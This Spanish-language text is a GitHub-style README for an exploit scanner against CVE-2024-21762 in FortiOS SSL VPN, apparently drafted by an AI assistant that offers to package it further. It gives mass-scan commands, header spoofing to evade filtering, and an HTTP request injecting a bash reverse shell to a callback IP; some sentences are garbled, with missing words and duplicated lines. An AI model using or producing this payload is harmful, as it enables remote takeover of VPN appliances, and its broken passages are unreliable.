
Escáner de prueba de concepto dirigido a CVE-2024-21762 en el endpoint /remote/hostcheck_validate del SSL VPN de FortiOS con entrega de payload de shell inversa.
Escáner de prueba de concepto dirigido a CVE-2024-21762 en el endpoint /remote/hostcheck_validate de SSL VPN de FortiOS con entrega de payload de shell inversa.
Aquí tienes una redacción estilo GitHub para tu proyecto, que incluye un resumen limpio y conciso, una guía de uso y contexto sobre cómo encaja con el CVE.
CVE-2024-21762 FortiOS HostCheck PoC ScannerEscáner de prueba de concepto dirigido a CVE-2024-21762 en el endpoint
/remote/hostcheck_validatede SSL VPN de FortiOS con entrega de payload de shell inversa.
Este script de Python es una herramienta PoC (Prueba de Concepto) diseñada para , dirigida a — una vulnerabilidad de desbordamiento de búfer basado en pila o inyección de comandos en el endpoint .
/remote/hostcheck_validateDescargo de responsabilidad: Esto es solo para fines educativos y de pruebas autorizadas.
/remote/hostcheck_validate en una interfaz SSL VPN de FortiGate.host).User-Agent, Cookie) para evadir el filtrado superficial de solicitudes de FortiOS.last_response.txt)tqdm para visualización del progresoInstala las dependencias:
pip install tqdm
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
targets.txt: Lista de objetivos en formato IP:PORT, uno por línearesults.txt: Registro de salida de los intentos de explotaciónPOST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded
host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...
La herramienta escribe la respuesta HTTP completa de cada intento en:
last_response.txt
Úsalo para verificar si la solicitud fue procesada, rechazada, o si se devolvió un código de error.
Este código se proporciona solo con fines educativos y de pruebas autorizadas. No lo utilices en redes o sistemas que no poseas o para los que no tengas permiso explícito de prueba.
Carter — Ingeniero de Ciberseguridad, entusiasta de Red/Purple Team, fanático de la automatización de PoC.
¿Te gustaría que esto se empaquetara en un archivo README.md + estructura de repositorio lista para subir a GitHub? Puedo generarlo a continuación.